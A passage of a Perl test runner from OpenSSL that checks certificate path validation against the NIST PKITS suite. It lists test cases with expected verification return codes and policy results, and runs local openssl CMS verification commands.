+# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+# OF THE POSSIBILITY OF SUCH DAMAGE.
+# ====================================================================
+
+# Perl utility to run PKITS tests for RFC3280 compliance. 
+
+my $ossl_path;
+
+if ( -f "../apps/openssl" ) {
+    $ossl_path = "../util/shlib_wrap.sh ../apps/openssl";
+}
+elsif ( -f "..\\out32dll\\openssl.exe" ) {
+    $ossl_path = "..\\out32dll\\openssl.exe";
+}
+elsif ( -f "..\\out32\\openssl.exe" ) {
+    $ossl_path = "..\\out32\\openssl.exe";
+}
+else {
+    die "Can't find OpenSSL executable";
+}
+
+my $pkitsdir = "pkits/smime";
+my $pkitsta = "pkits/certs/TrustAnchorRootCertificate.crt";
+
+die "Can't find PKITS test data" if !-d $pkitsdir;
+
+my $nist1 = "2.16.840.1.101.3.2.1.48.1";
+my $nist2 = "2.16.840.1.101.3.2.1.48.2";
+my $nist3 = "2.16.840.1.101.3.2.1.48.3";
+my $nist4 = "2.16.840.1.101.3.2.1.48.4";
+my $nist5 = "2.16.840.1.101.3.2.1.48.5";
+my $nist6 = "2.16.840.1.101.3.2.1.48.6";
+
+my $apolicy = "X509v3 Any Policy";
+
+# This table contains the chapter headings of the accompanying PKITS
+# document. They provide useful informational output and their names
+# can be converted into the filename to test.
+
+my @testlists = (
+    [ "4.1", "Signature Verification" ],
+    [ "4.1.1", "Valid Signatures Test1",                        0 ],
+    [ "4.1.2", "Invalid CA Signature Test2",                    7 ],
+    [ "4.1.3", "Invalid EE Signature Test3",                    7 ],
+    [ "4.1.4", "Valid DSA Signatures Test4",                    0 ],
+    [ "4.1.5", "Valid DSA Parameter Inheritance Test5",         0 ],
+    [ "4.1.6", "Invalid DSA Signature Test6",                   7 ],
+    [ "4.2",   "Validity Periods" ],
+    [ "4.2.1", "Invalid CA notBefore Date Test1",               9 ],
+    [ "4.2.2", "Invalid EE notBefore Date Test2",               9 ],
+    [ "4.2.3", "Valid pre2000 UTC notBefore Date Test3",        0 ],
+    [ "4.2.4", "Valid GeneralizedTime notBefore Date Test4",    0 ],
+    [ "4.2.5", "Invalid CA notAfter Date Test5",                10 ],
+    [ "4.2.6", "Invalid EE notAfter Date Test6",                10 ],
+    [ "4.2.7", "Invalid pre2000 UTC EE notAfter Date Test7",    10 ],
+    [ "4.2.8", "Valid GeneralizedTime notAfter Date Test8",     0 ],
+    [ "4.3",   "Verifying Name Chaining" ],
+    [ "4.3.1", "Invalid Name Chaining EE Test1",                20 ],
+    [ "4.3.2", "Invalid Name Chaining Order Test2",             20 ],
+    [ "4.3.3", "Valid Name Chaining Whitespace Test3",          0 ],
+    [ "4.3.4", "Valid Name Chaining Whitespace Test4",          0 ],
+    [ "4.3.5", "Valid Name Chaining Capitalization Test5",      0 ],
+    [ "4.3.6", "Valid Name Chaining UIDs Test6",                0 ],
+    [ "4.3.7", "Valid RFC3280 Mandatory Attribute Types Test7", 0 ],
+    [ "4.3.8", "Valid RFC3280 Optional Attribute Types Test8",  0 ],
+    [ "4.3.9", "Valid UTF8String Encoded Names Test9",          0 ],
+    [ "4.3.10", "Valid Rollover from PrintableString to UTF8String Test10", 0 ],
+    [ "4.3.11", "Valid UTF8String Case Insensitive Match Test11",           0 ],
+    [ "4.4",    "Basic Certificate Revocation Tests" ],
+    [ "4.4.1",  "Missing CRL Test1",                                        3 ],
+    [ "4.4.2", "Invalid Revoked CA Test2",          23 ],
+    [ "4.4.3", "Invalid Revoked EE Test3",          23 ],
+    [ "4.4.4", "Invalid Bad CRL Signature Test4",   8 ],
+    [ "4.4.5", "Invalid Bad CRL Issuer Name Test5", 3 ],
+    [ "4.4.6", "Invalid Wrong CRL Test6",           3 ],
+    [ "4.4.7", "Valid Two CRLs Test7",              0 ],
+
+    # The test document suggests these should return certificate revoked...
+    # Subsquent discussion has concluded they should not due to unhandle
+    # critical CRL extensions.
+    [ "4.4.8", "Invalid Unknown CRL Entry Extension Test8", 36 ],
+    [ "4.4.9", "Invalid Unknown CRL Extension Test9",       36 ],
+
+    [ "4.4.10", "Invalid Unknown CRL Extension Test10",             36 ],
+    [ "4.4.11", "Invalid Old CRL nextUpdate Test11",                12 ],
+    [ "4.4.12", "Invalid pre2000 CRL nextUpdate Test12",            12 ],
+    [ "4.4.13", "Valid GeneralizedTime CRL nextUpdate Test13",      0 ],
+    [ "4.4.14", "Valid Negative Serial Number Test14",              0 ],
+    [ "4.4.15", "Invalid Negative Serial Number Test15",            23 ],
+    [ "4.4.16", "Valid Long Serial Number Test16",                  0 ],
+    [ "4.4.17", "Valid Long Serial Number Test17",                  0 ],
+    [ "4.4.18", "Invalid Long Serial Number Test18",                23 ],
+    [ "4.4.19", "Valid Separate Certificate and CRL Keys Test19",   0 ],
+    [ "4.4.20", "Invalid Separate Certificate and CRL Keys Test20", 23 ],
+
+    # CRL path is revoked so get a CRL path validation error
+    [ "4.4.21", "Invalid Separate Certificate and CRL Keys Test21",      54 ],
+    [ "4.5",    "Verifying Paths with Self-Issued Certificates" ],
+    [ "4.5.1",  "Valid Basic Self-Issued Old With New Test1",            0 ],
+    [ "4.5.2",  "Invalid Basic Self-Issued Old With New Test2",          23 ],
+    [ "4.5.3",  "Valid Basic Self-Issued New With Old Test3",            0 ],
+    [ "4.5.4",  "Valid Basic Self-Issued New With Old Test4",            0 ],
+    [ "4.5.5",  "Invalid Basic Self-Issued New With Old Test5",          23 ],
+    [ "4.5.6",  "Valid Basic Self-Issued CRL Signing Key Test6",         0 ],
+    [ "4.5.7",  "Invalid Basic Self-Issued CRL Signing Key Test7",       23 ],
+    [ "4.5.8",  "Invalid Basic Self-Issued CRL Signing Key Test8",       20 ],
+    [ "4.6",    "Verifying Basic Constraints" ],
+    [ "4.6.1",  "Invalid Missing basicConstraints Test1",                24 ],
+    [ "4.6.2",  "Invalid cA False Test2",                                24 ],
+    [ "4.6.3",  "Invalid cA False Test3",                                24 ],
+    [ "4.6.4",  "Valid basicConstraints Not Critical Test4",             0 ],
+    [ "4.6.5",  "Invalid pathLenConstraint Test5",                       25 ],
+    [ "4.6.6",  "Invalid pathLenConstraint Test6",                       25 ],
+    [ "4.6.7",  "Valid pathLenConstraint Test7",                         0 ],
+    [ "4.6.8",  "Valid pathLenConstraint Test8",                         0 ],
+    [ "4.6.9",  "Invalid pathLenConstraint Test9",                       25 ],
+    [ "4.6.10", "Invalid pathLenConstraint Test10",                      25 ],
+    [ "4.6.11", "Invalid pathLenConstraint Test11",                      25 ],
+    [ "4.6.12", "Invalid pathLenConstraint Test12",                      25 ],
+    [ "4.6.13", "Valid pathLenConstraint Test13",                        0 ],
+    [ "4.6.14", "Valid pathLenConstraint Test14",                        0 ],
+    [ "4.6.15", "Valid Self-Issued pathLenConstraint Test15",            0 ],
+    [ "4.6.16", "Invalid Self-Issued pathLenConstraint Test16",          25 ],
+    [ "4.6.17", "Valid Self-Issued pathLenConstraint Test17",            0 ],
+    [ "4.7",    "Key Usage" ],
+    [ "4.7.1",  "Invalid keyUsage Critical keyCertSign False Test1",     20 ],
+    [ "4.7.2",  "Invalid keyUsage Not Critical keyCertSign False Test2", 20 ],
+    [ "4.7.3",  "Valid keyUsage Not Critical Test3",                     0 ],
+    [ "4.7.4",  "Invalid keyUsage Critical cRLSign False Test4",         35 ],
+    [ "4.7.5",  "Invalid keyUsage Not Critical cRLSign False Test5",     35 ],
+
+    # Certificate policy tests need special handling. They can have several
+    # sub tests and we need to check the outputs are correct.
+
+    [ "4.8", "Certificate Policies" ],
+    [
+        "4.8.1.1",
+        "All Certificates Same Policy Test1",
+        "-policy anyPolicy -explicit_policy",
+        "True", $nist1, $nist1, 0
+    ],
+    [
+        "4.8.1.2",
+        "All Certificates Same Policy Test1",
+        "-policy $nist1 -explicit_policy",
+        "True", $nist1, $nist1, 0
+    ],
+    [
+        "4.8.1.3",
+        "All Certificates Same Policy Test1",
+        "-policy $nist2 -explicit_policy",
+        "True", $nist1, "<empty>", 43
+    ],
+    [
+        "4.8.1.4",
+        "All Certificates Same Policy Test1",
+        "-policy $nist1 -policy $nist2 -explicit_policy",
+        "True", $nist1, $nist1, 0
+    ],
+    [
+        "4.8.2.1",
+        "All Certificates No Policies Test2",
+        "-policy anyPolicy",
+        "False", "<empty>", "<empty>", 0
+    ],
+    [
+        "4.8.2.2",
+        "All Certificates No Policies Test2",
+        "-policy anyPolicy -explicit_policy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.8.3.1",
+        "Different Policies Test3",
+        "-policy anyPolicy",
+        "False", "<empty>", "<empty>", 0
+    ],
+    [
+        "4.8.3.2",
+        "Different Policies Test3",
+        "-policy anyPolicy -explicit_policy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.8.3.3",
+        "Different Policies Test3",
+        "-policy $nist1 -policy $nist2 -explicit_policy",
+        "True", "<empty>", "<empty>", 43
+    ],
+
+    [
+        "4.8.4",
+        "Different Policies Test4",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.8.5",
+        "Different Policies Test5",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.8.6.1",
+        "Overlapping Policies Test6",
+        "-policy anyPolicy",
+        "True", $nist1, $nist1, 0
+    ],
+    [
+        "4.8.6.2",
+        "Overlapping Policies Test6",
+        "-policy $nist1",
+        "True", $nist1, $nist1, 0
+    ],
+    [
+        "4.8.6.3",
+        "Overlapping Policies Test6",
+        "-policy $nist2",
+        "True", $nist1, "<empty>", 43
+    ],
+    [
+        "4.8.7",
+        "Different Policies Test7",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.8.8",
+        "Different Policies Test8",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.8.9",
+        "Different Policies Test9",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.8.10.1",
+        "All Certificates Same Policies Test10",
+        "-policy $nist1",
+        "True", "$nist1:$nist2", "$nist1", 0
+    ],
+    [
+        "4.8.10.2",
+        "All Certificates Same Policies Test10",
+        "-policy $nist2",
+        "True", "$nist1:$nist2", "$nist2", 0
+    ],
+    [
+        "4.8.10.3",
+        "All Certificates Same Policies Test10",
+        "-policy anyPolicy",
+        "True", "$nist1:$nist2", "$nist1:$nist2", 0
+    ],
+    [
+        "4.8.11.1",
+        "All Certificates AnyPolicy Test11",
+        "-policy anyPolicy",
+        "True", "$apolicy", "$apolicy", 0
+    ],
+    [
+        "4.8.11.2",
+        "All Certificates AnyPolicy Test11",
+        "-policy $nist1",
+        "True", "$apolicy", "$nist1", 0
+    ],
+    [
+        "4.8.12",
+        "Different Policies Test12",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.8.13.1",
+        "All Certificates Same Policies Test13",
+        "-policy $nist1",
+        "True", "$nist1:$nist2:$nist3", "$nist1", 0
+    ],
+    [
+        "4.8.13.2",
+        "All Certificates Same Policies Test13",
+        "-policy $nist2",
+        "True", "$nist1:$nist2:$nist3", "$nist2", 0
+    ],
+    [
+        "4.8.13.3",
+        "All Certificates Same Policies Test13",
+        "-policy $nist3",
+        "True", "$nist1:$nist2:$nist3", "$nist3", 0
+    ],
+    [
+        "4.8.14.1",       "AnyPolicy Test14",
+        "-policy $nist1", "True",
+        "$nist1",         "$nist1",
+        0
+    ],
+    [
+        "4.8.14.2",       "AnyPolicy Test14",
+        "-policy $nist2", "True",
+        "$nist1",         "<empty>",
+        43
+    ],
+    [
+        "4.8.15",
+        "User Notice Qualifier Test15",
+        "-policy anyPolicy",
+        "False", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.8.16",
+        "User Notice Qualifier Test16",
+        "-policy anyPolicy",
+        "False", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.8.17",
+        "User Notice Qualifier Test17",
+        "-policy anyPolicy",
+        "False", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.8.18.1",
+        "User Notice Qualifier Test18",
+        "-policy $nist1",
+        "True", "$nist1:$nist2", "$nist1", 0
+    ],
+    [
+        "4.8.18.2",
+        "User Notice Qualifier Test18",
+        "-policy $nist2",
+        "True", "$nist1:$nist2", "$nist2", 0
+    ],
+    [
+        "4.8.19",
+        "User Notice Qualifier Test19",
+        "-policy anyPolicy",
+        "False", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.8.20",
+        "CPS Pointer Qualifier Test20",
+        "-policy anyPolicy -explicit_policy",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [ "4.9", "Require Explicit Policy" ],
+    [
+        "4.9.1",
+        "Valid RequireExplicitPolicy Test1",
+        "-policy anyPolicy",
+        "False", "<empty>", "<empty>", 0
+    ],
+    [
+        "4.9.2",
+        "Valid RequireExplicitPolicy Test2",
+        "-policy anyPolicy",
+        "False", "<empty>", "<empty>", 0
+    ],
+    [
+        "4.9.3",
+        "Invalid RequireExplicitPolicy Test3",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.9.4",
+        "Valid RequireExplicitPolicy Test4",
+        "-policy anyPolicy",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.9.5",
+        "Invalid RequireExplicitPolicy Test5",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.9.6",
+        "Valid Self-Issued requireExplicitPolicy Test6",
+        "-policy anyPolicy",
+        "False", "<empty>", "<empty>", 0
+    ],
+    [
+        "4.9.7",
+        "Invalid Self-Issued requireExplicitPolicy Test7",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.9.8",
+        "Invalid Self-Issued requireExplicitPolicy Test8",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [ "4.10", "Policy Mappings" ],
+    [
+        "4.10.1.1",
+        "Valid Policy Mapping Test1",
+        "-policy $nist1",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.10.1.2",
+        "Valid Policy Mapping Test1",
+        "-policy $nist2",
+        "True", "$nist1", "<empty>", 43
+    ],
+    [
+        "4.10.1.3",
+        "Valid Policy Mapping Test1",
+        "-policy anyPolicy -inhibit_map",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.10.2.1",
+        "Invalid Policy Mapping Test2",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.10.2.2",
+        "Invalid Policy Mapping Test2",
+        "-policy anyPolicy -inhibit_map",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.10.3.1",
+        "Valid Policy Mapping Test3",
+        "-policy $nist1",
+        "True", "$nist2", "<empty>", 43
+    ],
+    [
+        "4.10.3.2",
+        "Valid Policy Mapping Test3",
+        "-policy $nist2",
+        "True", "$nist2", "$nist2", 0
+    ],
+    [
+        "4.10.4",
+        "Invalid Policy Mapping Test4",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.10.5.1",
+        "Valid Policy Mapping Test5",
+        "-policy $nist1",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.10.5.2",
+        "Valid Policy Mapping Test5",
+        "-policy $nist6",
+        "True", "$nist1", "<empty>", 43
+    ],
+    [
+        "4.10.6.1",
+        "Valid Policy Mapping Test6",
+        "-policy $nist1",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.10.6.2",
+        "Valid Policy Mapping Test6",
+        "-policy $nist6",
+        "True", "$nist1", "<empty>", 43
+    ],
+    [ "4.10.7", "Invalid Mapping From anyPolicy Test7", 42 ],
+    [ "4.10.8", "Invalid Mapping To anyPolicy Test8",   42 ],
+    [
+        "4.10.9",
+        "Valid Policy Mapping Test9",
+        "-policy anyPolicy",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.10.10",
+        "Invalid Policy Mapping Test10",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.10.11",
+        "Valid Policy Mapping Test11",
+        "-policy anyPolicy",
+        "True", "$nist1", "$nist1", 0
+    ],
+
+    # TODO: check notice display
+    [
+        "4.10.12.1",
+        "Valid Policy Mapping Test12",
+        "-policy $nist1",
+        "True", "$nist1:$nist2", "$nist1", 0
+    ],
+
+    # TODO: check notice display
+    [
+        "4.10.12.2",
+        "Valid Policy Mapping Test12",
+        "-policy $nist2",
+        "True", "$nist1:$nist2", "$nist2", 0
+    ],
+    [
+        "4.10.13",
+        "Valid Policy Mapping Test13",
+        "-policy anyPolicy",
+        "True", "$nist1", "$nist1", 0
+    ],
+
+    # TODO: check notice display
+    [
+        "4.10.14",
+        "Valid Policy Mapping Test14",
+        "-policy anyPolicy",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [ "4.11", "Inhibit Policy Mapping" ],
+    [
+        "4.11.1",
+        "Invalid inhibitPolicyMapping Test1",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.11.2",
+        "Valid inhibitPolicyMapping Test2",
+        "-policy anyPolicy",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.11.3",
+        "Invalid inhibitPolicyMapping Test3",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.11.4",
+        "Valid inhibitPolicyMapping Test4",
+        "-policy anyPolicy",
+        "True", "$nist2", "$nist2", 0
+    ],
+    [
+        "4.11.5",
+        "Invalid inhibitPolicyMapping Test5",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.11.6",
+        "Invalid inhibitPolicyMapping Test6",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.11.7",
+        "Valid Self-Issued inhibitPolicyMapping Test7",
+        "-policy anyPolicy",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.11.8",
+        "Invalid Self-Issued inhibitPolicyMapping Test8",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.11.9",
+        "Invalid Self-Issued inhibitPolicyMapping Test9",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.11.10",
+        "Invalid Self-Issued inhibitPolicyMapping Test10",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.11.11",
+        "Invalid Self-Issued inhibitPolicyMapping Test11",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [ "4.12", "Inhibit Any Policy" ],
+    [
+        "4.12.1",
+        "Invalid inhibitAnyPolicy Test1",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.12.2",
+        "Valid inhibitAnyPolicy Test2",
+        "-policy anyPolicy",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.12.3.1",
+        "inhibitAnyPolicy Test3",
+        "-policy anyPolicy",
+        "True", "$nist1", "$nist1", 0
+    ],
+    [
+        "4.12.3.2",
+        "inhibitAnyPolicy Test3",
+        "-policy anyPolicy -inhibit_any",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.12.4",
+        "Invalid inhibitAnyPolicy Test4",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.12.5",
+        "Invalid inhibitAnyPolicy Test5",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [
+        "4.12.6",
+        "Invalid inhibitAnyPolicy Test6",
+        "-policy anyPolicy",
+        "True", "<empty>", "<empty>", 43
+    ],
+    [ "4.12.7",  "Valid Self-Issued inhibitAnyPolicy Test7",      0 ],
+    [ "4.12.8",  "Invalid Self-Issued inhibitAnyPolicy Test8",    43 ],
+    [ "4.12.9",  "Valid Self-Issued inhibitAnyPolicy Test9",      0 ],
+    [ "4.12.10", "Invalid Self-Issued inhibitAnyPolicy Test10",   43 ],
+    [ "4.13",    "Name Constraints" ],
+    [ "4.13.1",  "Valid DN nameConstraints Test1",                0 ],
+    [ "4.13.2",  "Invalid DN nameConstraints Test2",              47 ],
+    [ "4.13.3",  "Invalid DN nameConstraints Test3",              47 ],
+    [ "4.13.4",  "Valid DN nameConstraints Test4",                0 ],
+    [ "4.13.5",  "Valid DN nameConstraints Test5",                0 ],
+    [ "4.13.6",  "Valid DN nameConstraints Test6",                0 ],
+    [ "4.13.7",  "Invalid DN nameConstraints Test7",              48 ],
+    [ "4.13.8",  "Invalid DN nameConstraints Test8",              48 ],
+    [ "4.13.9",  "Invalid DN nameConstraints Test9",              48 ],
+    [ "4.13.10", "Invalid DN nameConstraints Test10",             48 ],
+    [ "4.13.11", "Valid DN nameConstraints Test11",               0 ],
+    [ "4.13.12", "Invalid DN nameConstraints Test12",             47 ],
+    [ "4.13.13", "Invalid DN nameConstraints Test13",             47 ],
+    [ "4.13.14", "Valid DN nameConstraints Test14",               0 ],
+    [ "4.13.15", "Invalid DN nameConstraints Test15",             48 ],
+    [ "4.13.16", "Invalid DN nameConstraints Test16",             48 ],
+    [ "4.13.17", "Invalid DN nameConstraints Test17",             48 ],
+    [ "4.13.18", "Valid DN nameConstraints Test18",               0 ],
+    [ "4.13.19", "Valid Self-Issued DN nameConstraints Test19",   0 ],
+    [ "4.13.20", "Invalid Self-Issued DN nameConstraints Test20", 47 ],
+    [ "4.13.21", "Valid RFC822 nameConstraints Test21",           0 ],
+    [ "4.13.22", "Invalid RFC822 nameConstraints Test22",         47 ],
+    [ "4.13.23", "Valid RFC822 nameConstraints Test23",           0 ],
+    [ "4.13.24", "Invalid RFC822 nameConstraints Test24",         47 ],
+    [ "4.13.25", "Valid RFC822 nameConstraints Test25",           0 ],
+    [ "4.13.26", "Invalid RFC822 nameConstraints Test26",         48 ],
+    [ "4.13.27", "Valid DN and RFC822 nameConstraints Test27",    0 ],
+    [ "4.13.28", "Invalid DN and RFC822 nameConstraints Test28",  47 ],
+    [ "4.13.29", "Invalid DN and RFC822 nameConstraints Test29",  47 ],
+    [ "4.13.30", "Valid DNS nameConstraints Test30",              0 ],
+    [ "4.13.31", "Invalid DNS nameConstraints Test31",            47 ],
+    [ "4.13.32", "Valid DNS nameConstraints Test32",              0 ],
+    [ "4.13.33", "Invalid DNS nameConstraints Test33",            48 ],
+    [ "4.13.34", "Valid URI nameConstraints Test34",              0 ],
+    [ "4.13.35", "Invalid URI nameConstraints Test35",            47 ],
+    [ "4.13.36", "Valid URI nameConstraints Test36",              0 ],
+    [ "4.13.37", "Invalid URI nameConstraints Test37",            48 ],
+    [ "4.13.38", "Invalid DNS nameConstraints Test38",            47 ],
+    [ "4.14",    "Distribution Points" ],
+    [ "4.14.1",  "Valid distributionPoint Test1",                 0 ],
+    [ "4.14.2",  "Invalid distributionPoint Test2",               23 ],
+    [ "4.14.3",  "Invalid distributionPoint Test3",               44 ],
+    [ "4.14.4",  "Valid distributionPoint Test4",                 0 ],
+    [ "4.14.5",  "Valid distributionPoint Test5",                 0 ],
+    [ "4.14.6",  "Invalid distributionPoint Test6",               23 ],
+    [ "4.14.7",  "Valid distributionPoint Test7",                 0 ],
+    [ "4.14.8",  "Invalid distributionPoint Test8",               44 ],
+    [ "4.14.9",  "Invalid distributionPoint Test9",               44 ],
+    [ "4.14.10", "Valid No issuingDistributionPoint Test10",      0 ],
+    [ "4.14.11", "Invalid onlyContainsUserCerts CRL Test11",      44 ],
+    [ "4.14.12", "Invalid onlyContainsCACerts CRL Test12",        44 ],
+    [ "4.14.13", "Valid onlyContainsCACerts CRL Test13",          0 ],
+    [ "4.14.14", "Invalid onlyContainsAttributeCerts Test14",     44 ],
+    [ "4.14.15", "Invalid onlySomeReasons Test15",                23 ],
+    [ "4.14.16", "Invalid onlySomeReasons Test16",                23 ],
+    [ "4.14.17", "Invalid onlySomeReasons Test17",                3 ],
+    [ "4.14.18", "Valid onlySomeReasons Test18",                  0 ],
+    [ "4.14.19", "Valid onlySomeReasons Test19",                  0 ],
+    [ "4.14.20", "Invalid onlySomeReasons Test20",                23 ],
+    [ "4.14.21", "Invalid onlySomeReasons Test21",                23 ],
+    [ "4.14.22", "Valid IDP with indirectCRL Test22",             0 ],
+    [ "4.14.23", "Invalid IDP with indirectCRL Test23",           23 ],
+    [ "4.14.24", "Valid IDP with indirectCRL Test24",             0 ],
+    [ "4.14.25", "Valid IDP with indirectCRL Test25",             0 ],
+    [ "4.14.26", "Invalid IDP with indirectCRL Test26",           44 ],
+    [ "4.14.27", "Invalid cRLIssuer Test27",                      3 ],
+    [ "4.14.28", "Valid cRLIssuer Test28",                        0 ],
+    [ "4.14.29", "Valid cRLIssuer Test29",                        0 ],
+
+    # Although this test is valid it has a circular dependency. As a result
+    # an attempt is made to reursively checks a CRL path and rejected due to
+    # a CRL path validation error. PKITS notes suggest this test does not
+    # need to be run due to this issue.
+    [ "4.14.30", "Valid cRLIssuer Test30",                                 54 ],
+    [ "4.14.31", "Invalid cRLIssuer Test31",                               23 ],
+    [ "4.14.32", "Invalid cRLIssuer Test32",                               23 ],
+    [ "4.14.33", "Valid cRLIssuer Test33",                                 0 ],
+    [ "4.14.34", "Invalid cRLIssuer Test34",                               23 ],
+    [ "4.14.35", "Invalid cRLIssuer Test35",                               44 ],
+    [ "4.15",    "Delta-CRLs" ],
+    [ "4.15.1",  "Invalid deltaCRLIndicator No Base Test1",                3 ],
+    [ "4.15.2",  "Valid delta-CRL Test2",                                  0 ],
+    [ "4.15.3",  "Invalid delta-CRL Test3",                                23 ],
+    [ "4.15.4",  "Invalid delta-CRL Test4",                                23 ],
+    [ "4.15.5",  "Valid delta-CRL Test5",                                  0 ],
+    [ "4.15.6",  "Invalid delta-CRL Test6",                                23 ],
+    [ "4.15.7",  "Valid delta-CRL Test7",                                  0 ],
+    [ "4.15.8",  "Valid delta-CRL Test8",                                  0 ],
+    [ "4.15.9",  "Invalid delta-CRL Test9",                                23 ],
+    [ "4.15.10", "Invalid delta-CRL Test10",                               12 ],
+    [ "4.16",    "Private Certificate Extensions" ],
+    [ "4.16.1",  "Valid Unknown Not Critical Certificate Extension Test1", 0 ],
+    [ "4.16.2",  "Invalid Unknown Critical Certificate Extension Test2",   34 ],
+);
+
+
+my $verbose = 1;
+
+my $numtest = 0;
+my $numfail = 0;
+
+my $ossl = "ossl/apps/openssl";
+
+my $ossl_cmd = "$ossl_path cms -verify -verify_retcode ";
+$ossl_cmd .= "-CAfile pkitsta.pem -crl_check_all -x509_strict ";
+
+# Check for expiry of trust anchor
+system "$ossl_path x509 -inform DER -in $pkitsta -checkend 0";
+if ($? == 256)
+	{
+	print STDERR "WARNING: using older expired data\n";
+	$ossl_cmd .= "-attime 1291940972 ";
+	}
+
+$ossl_cmd .= "-policy_check -extended_crl -use_deltas -out /dev/null 2>&1 ";
+
+system "$ossl_path x509 -inform DER -in $pkitsta -out pkitsta.pem";
+
+die "Can't create trust anchor file" if $?;
+
+print "Running PKITS tests:\n" if $verbose;
+
+foreach (@testlists) {
+    my $argnum = @$_;
+    if ( $argnum == 2 ) {
+        my ( $tnum, $title ) = @$_;
+        print "$tnum $title\n" if $verbose;
+    }
+    elsif ( $argnum == 3 ) {
+        my ( $tnum, $title, $exp_ret ) = @$_;
+        my $filename = $title;
+        $exp_ret += 32 if $exp_ret;
+        $filename =~ tr/ -//d;
+        $filename = "Signed${filename}.eml";
+        if ( !-f "$pkitsdir/$filename" ) {
+            print "\"$filename\" not found\n";
+        }
+        else {
+            my $ret;
+            my $test_fail = 0;
+            my $errmsg    = "";
+            my $cmd       = $ossl_cmd;
+            $cmd .= "-in $pkitsdir/$filename -policy anyPolicy";
+            my $cmdout = `$cmd`;
+            $ret = $? >> 8;
+            if ( $? & 0xff ) {
+                $errmsg .= "Abnormal OpenSSL termination\n";
+                $test_fail = 1;
+            }
+            if ( $exp_ret != $ret ) {
+                $errmsg .= "Return code:$ret, ";
+                $errmsg .= "expected $exp_ret\n";
+                $test_fail = 1;
+            }
+            if ($test_fail) {
+                print "$tnum $title : Failed!\n";
+                print "Filename: $pkitsdir/$filename\n";
+                print $errmsg;
+                print "Command output:\n$cmdout\n";
+                $numfail++;
+            }
+            $numtest++;
+        }
+    }
+    elsif ( $argnum == 7 ) {
+        my ( $tnum, $title, $exargs, $exp_epol, $exp_aset, $exp_uset, $exp_ret )
+          = @$_;
+        my $filename = $title;
+        $exp_ret += 32 if $exp_ret;
+        $filename =~ tr/ -//d;
+        $filename = "Signed${filename}.eml";
+        if ( !-f "$pkitsdir/$filename" ) {
+            print "\"$filename\" not found\n";
+        }
+        else {
+            my $ret;
+            my $cmdout    = "";
+            my $errmsg    = "";
+            my $epol      = "";
+            my $aset      = "";
+            my $uset      = "";
+            my $pol       = -1;
+            my $test_fail = 0;
+            my $cmd       = $ossl_cmd;
+            $cmd .= "-in $pkitsdir/$filename $exargs -policy_print";
+            @oparr = `$cmd`;
+            $ret   = $? >> 8;
+
+            if ( $? & 0xff ) {
+                $errmsg .= "Abnormal OpenSSL termination\n";
+                $test_fail = 1;
+            }
+            foreach (@oparr) {
+                my $test_failed = 0;
+                $cmdout .= $_;
+                if (/^Require explicit Policy: (.*)$/) {
+                    $epol = $1;
+                }
